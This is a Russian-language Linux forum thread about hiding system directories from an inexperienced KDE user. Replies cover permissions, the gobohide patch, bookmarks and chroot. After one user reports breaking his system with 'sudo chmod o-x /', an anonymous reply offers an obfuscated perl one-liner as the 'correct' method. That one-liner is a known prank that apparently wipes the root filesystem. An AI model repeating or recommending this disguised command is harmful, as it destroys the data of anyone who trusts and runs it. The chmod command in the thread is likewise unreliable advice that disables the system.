LINUX.ORG.RU

запретить доступ выше определённого каталога?

 ,


1

0

как в кедах запретить пользователю попадать в каталоги, выше разрешённого?

1. нужно чтоб человек не смог дельфином, фаерфоксом и любыими другими графическими программами попасть в корень, /var /etc и так далее.

2. желательно чтоб человек вообще не знал, что есть каталоги кроме определённого.
в дельфине, например, если стереть всё кроме / из адресной строки - выпадают варианты /boot/ /bin/ /etc/ /lib/ /usr/ /... - как их скрыть?

★★★★★

Мде, дожили. Совсем уже у людей мастдайка головного мозга. Про права доступа мы не слышали...

Eddy_Em ☆☆☆☆☆ ()
Ответ на: комментарий от Kindly_Cat

Самый очевидный способ - наложить на ядро патч gobohide.

Он скрывает каталоги, но если знать путь, войти в них можно.

gentoo_root ★★★★★ ()
Ответ на: комментарий от Eddy_Em

Про права доступа мы не слышали...

да даже chmod o-x / и у тебя dolphin не запустится

teod0r ★★★★★ ()
Ответ на: комментарий от Axon

А зачем это вообще нужно?

ставлю линукс маме на компьютер. зачем ей объяснять, что вот это системные каталоги и заходить туда тебе не нужно - она компы только по телевизору видела, ну и так со стороны мельком - заблудится же в каталогах

teod0r ★★★★★ ()
Ответ на: комментарий от teod0r

зачем ей объяснять, что вот это системные каталоги и заходить туда тебе не нужно

И правда, зачем? Что страшного случится если она туда зайдёт?

заблудится же в каталогах

-_\\ Никакого уважения к родителям...

Axon ★★★★★ ()
Ответ на: комментарий от gentoo_root

Он скрывает каталоги, но если знать путь, войти в них можно.

это мне и нужно, главное чтоб не видно было для обычного пользователя. есть альтернативаные методы?

teod0r ★★★★★ ()
Ответ на: комментарий от teod0r

На рабочем столе расположить Home, Documents, Video, по которым сразу попадать в нужный каталог. Плюс: все это на виду, не нужно искать в меню всякие Dolphin. Еще сделать Bookmarks в самом Dolphin. Это намного лучше, чем если вдруг понадобится войти в папку, а возможности не будет.

anonymous ()
Ответ на: комментарий от Axon

-_\\ Никакого уважения к родителям...

что-то не вижу логики. наоборот: меньше ненужного = удобство. она с электроникой не дружит

teod0r ★★★★★ ()
Ответ на: комментарий от teod0r

что-то не вижу логики.

Вы явно принимаете её за слабоумную.

меньше ненужного = удобство

Если оно ей не нужно, она этого не заметит. Моя мама, например, никаких проблем с иерархической FS не испытывает, и, кажется, даже не в курсе, что при открытии файлового менеджера попадает не в корневой каталог. В конце концов, миллионы людей, далёких от IT, работают в windows и то, что «мои документы» находятся по адесу C:\users\user\Documents and Settings\Документы\, совершенно никак им не мешает.

Axon ★★★★★ ()
Последнее исправление: Axon (всего исправлений: 1)
Ответ на: комментарий от Axon

А если ТЗ по-человечески оформить? Я понял, что ТС просто не хочет пускать юзверей в чужие «хомяки» и во всякие /var/log

Eddy_Em ☆☆☆☆☆ ()
Ответ на: комментарий от teod0r

есть альтернативаные методы?

Mac OS X. Говорят, там из файлового менеджера фиг попадёшь в корень.

gentoo_root ★★★★★ ()
Ответ на: комментарий от Eddy_Em

Я понял, что ТС просто не хочет пускать юзверей в чужие «хомяки» и во всякие /var/log

А туда и так доступа нет, вообще-то.

Axon ★★★★★ ()
Ответ на: комментарий от Eddy_Em

Ну ты и конь! Нафига скрывать-то? Это же тебе не мастдайка сраная.

а на андрофонах разве не скрыто всё это?

teod0r ★★★★★ ()
Ответ на: комментарий от Eddy_Em

Кое-что можно прочитать всем.

Я сейчас для пробы создал нового юзера. По умолчанию права на его каталог установились drwx------.

Axon ★★★★★ ()
Ответ на: комментарий от Axon

Это смотря что за дистрибутив.

А в /var/log у меня так:

ll /var/log
итого 5649
-rw-r----- 1 root log   429122 окт.  28 12:22 auth.log
-rw-r--r-- 1 root root  288588 окт.  28 12:20 boot
-rw------- 1 root utmp    2688 окт.  10 17:00 btmp
drwxr-xr-x 2 root root      72 окт.   3 01:28 ConsoleKit/
-rw-r----- 1 root log   318624 окт.  28 12:20 crond.log
drwxr-xr-x 2 root root     168 окт.   3 01:28 cups/
-rw-r----- 1 root log   436519 окт.  28 12:20 daemon.log
-rw-r--r-- 1 root root   52433 окт.  28 12:18 dmesg.log
-rw-r----- 1 root log   510632 окт.  28 12:20 errors.log
-rw-r----- 1 root log  1499148 окт.  28 12:43 everything.log
-rw------- 1 root root   32032 окт.  17 08:25 faillog
drwxrwxr-- 3 root lp       184 окт.  18 15:55 hp/
drwxr-xr-x 2 root root     232 окт.  28 12:20 httpd/
drwxr-xr-x 2 root root      48 окт.  25 04:37 journal/
-rw-r----- 1 root log   666443 окт.  28 12:23 kernel.log
-rw-r--r-- 1 root root  292292 окт.  28 12:20 lastlog
-rw-r----- 1 root log     5625 окт.  25 14:26 lpr.log
-rw-r----- 1 root log   598913 окт.  28 12:43 messages.log
-rw-r--r-- 1 root root    1212 окт.  28 12:18 ntp.log
-rw-r--r-- 1 root root    1620 апр.  16  2012 nvidia-installer.log
drwxr-xr-x 2 root root      48 окт.  23 18:30 old/
-rw-r--r-- 1 root root  496573 окт.  28 12:21 pacman.log
-rw-r--r-- 1 root root   34517 окт.  11 13:22 pm-powersave.log
drwxr-xr-x 2 root root     176 авг.  23 11:39 proftpd/
drwxr-xr-x 3 root root    5840 окт.  25 14:37 samba/
-rw------- 1 root root   44810 окт.  28 12:20 shorewall-init.log
-rw-r----- 1 root log     1006 окт.  28 12:18 syslog.log
-rw-r----- 1 root log    22518 окт.  28 12:20 user.log
-rw-rw-r-- 1 root utmp  227712 окт.  28 12:50 wtmp
-rw-r--r-- 1 root root    3123 окт.  28 12:33 xdm.log
-rw-r--r-- 1 root root   21699 окт.  28 12:20 Xorg.0.log
-rw-r--r-- 1 root root   22141 окт.  27 17:34 Xorg.0.log.old

Eddy_Em ☆☆☆☆☆ ()
Ответ на: комментарий от Eddy_Em

Ok, с логами по-разному. Видимо, зависит от степени их конфеденциальности. Но $HOME, думаю, везде должен быть одинаковым.

Axon ★★★★★ ()
Ответ на: комментарий от teod0r

А их не надо стартовать в чруте, они должны быть запущены в основной системе. Ну и каталог пустым не будет, там должны быть твои кеды со всеми потрохами.

tides ()

Тьфу, блин

Наткнулся на эту тему, решил сделать sudo chmod o-x /
Сделал, блин. Промучался полтора часа.

UFO-man ()
Ответ на: Тьфу, блин от UFO-man

Re: Тьфу, блин

Вот поэтому не всё что видишь надо сразу пысать в терминал. Правильный вариант:

echo «test... test... test...» | perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/" -;;s;;$_;see'

anonymous ()

Предлагаю в Вики написать статью «Как прятать порно в Линуксе?»

Alve ★★★★★ ()
Ответ на: комментарий от tides

почему «не подходит»?
Ну и каталог пустым не будет, там должны быть твои кеды со всеми потрохами

так при чём тут размер диска?

teod0r ★★★★★ ()
Ответ на: комментарий от tides

И таки в чём проблема?

а то что хламу конфигов с точками не место на разделе с данными. его место в $HOME. и эти конфиги будут мешать.

teod0r ★★★★★ ()
Вы не можете добавлять комментарии в эту тему. Тема перемещена в архив.